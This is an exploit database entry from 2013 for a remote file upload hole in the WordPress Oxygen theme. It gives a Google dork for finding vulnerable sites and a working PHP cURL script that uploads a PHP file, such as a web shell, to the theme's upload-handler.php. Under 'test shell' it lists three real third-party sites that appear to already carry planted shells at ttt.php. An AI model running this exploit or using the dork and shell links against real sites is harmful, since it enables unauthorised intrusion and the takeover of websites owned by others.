id: 21514
date: 11/13/2013
title: WordPress oxygen-theme Themes Remote File Upload Vulnerability
author: iskorpitx
cves: 

###################################################################################################
# Exploit Title: WordPress oxygen-theme Themes Remote File Upload Vulnerability
# Author: iskorpitx
# Date: 12/11/2013
# Vendor Homepage: http://www.orange-themes.com/
# Themes Link: http://www.orange-themes.com/portfolio/oxygen/
# Infected File: upload-handler.php
# Category: webapps
# Google dork: "/wp-content/themes/oxygen-theme/"
# Tested on : Windows/Linux
###################################################################################################

# Exploit


<?php 
$uploadfile="upload.php"; 
$ch = curl_init("http://127.0.0.1/wp-content/themes/oxygen-theme/functions/upload-handler.php"); 
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile")); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
$postResult = curl_exec($ch); 
curl_close($ch); 
print "$postResult"; 
?>

http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php


_________________________________

All http://www.mavi1.org members


---
test shell

http://www.potbot.de/wp-content/uploads/2013/11/ttt.php
http://klimatrol.com/wp-content/uploads/2013/11/ttt.php
http://toldos3d.com/wp-content/uploads/2013/11/ttt.php

#  0day.today [2023-03-24]  #